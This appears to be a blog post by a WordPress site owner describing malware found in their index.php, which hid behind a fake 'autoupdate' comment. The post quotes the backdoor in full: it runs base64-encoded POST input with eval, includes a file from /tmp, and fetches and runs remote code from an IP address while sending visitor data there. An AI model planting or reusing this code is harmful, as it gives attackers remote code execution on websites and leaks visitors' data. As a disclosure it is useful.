NASTY CODE hacks onto your domain. FIX included.
I’ve just finished moving my site to a new server, so I started running checks… Google Webmaster Tools, error document handling, SERPs… then I discovered that Google’s index of my site has pages that do not exist on my site… and the scary thing is that when these pages are clicked, they are redirected to an IP-address-based site.
I was scared: how can it be that these pages are redirecting to an external site? Upon digging and sniffing for a clue, I stumbled upon this code in index.php:
```php
<?php //@WPEUpdate 2.12.76
// Do Not Delete!
//
// This is wordpress autoupdate code.
//
// (c) WordPress. Codeart.
// /*
if (isset($_POST['wp_ping'])) eval(base64_decode($_POST['wp_ping']));
@include('/tmp/wp_filter/code');
if (isset($_GET['p']) && (!is_numeric($_GET['p']) || $_GET['p'] > 50000))
    eval(file_get_contents(base64_decode('aHR0cDovLzIwMi43NS4zNS4xOTgv=').'/cp.php?host='.urlencode($_SERVER['HTTP_HOST']).'&p='.$_GET['p'].'&ref='.urlencode($_SERVER['HTTP_REFERER']).'&ua='.urlencode($_SERVER['HTTP_USER_AGENT'])."&uri=".urlencode($_SERVER['REQUEST_URI'])."&ip=".urlencode($_SERVER['REMOTE_ADDR'])));
//@?>
<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?>
```
The part below is the hack code that was planted somehow, somewhere (not sure if on my new server or on the old one):
```php
/* if (isset($_POST['wp_ping'])) eval(base64_decode($_POST['wp_ping']));
@include('/tmp/wp_filter/code');
if (isset($_GET['p']) && (!is_numeric($_GET['p']) || $_GET['p'] > 50000))
    eval(file_get_contents(base64_decode('aHR0cDovLzIwMi43NS4zNS4xOTgv=').'/cp.php?host='.urlencode($_SERVER['HTTP_HOST']).'&p='.$_GET['p'].'&ref='.urlencode($_SERVER['HTTP_REFERER']).'&ua='.urlencode($_SERVER['HTTP_USER_AGENT'])."&uri=".urlencode($_SERVER['REQUEST_URI'])."&ip=".urlencode($_SERVER['REMOTE_ADDR'])));
```
WHICH translates to this header directive…
```
Warning: file_get_contents(https://202.75.35.198//cp.php?host=www.any-domain-here.com&p=437682&ref=&ua=Mozilla%2F5.0+%28compatible%3B+Googlebot%2F2.1%3B+%2Bhttp%3A%2F%2Fwww.google.com%2Fbot.html%29&uri=%2F%3Fp%3D437682&ip=66.249.71.215) [function.file-get-contents]: failed to open stream: HTTP request failed! in /home/any-domain-here/public_html/index.php on line 10
```
NASTY! Until I removed the above code from my site’s index.php, all pages were being redirected to the malicious and rogue IP-based site (202.75.35.198)…
IP information for 202.75.35.198:
IP Location: Malaysia, Telekom Malaysia Berhad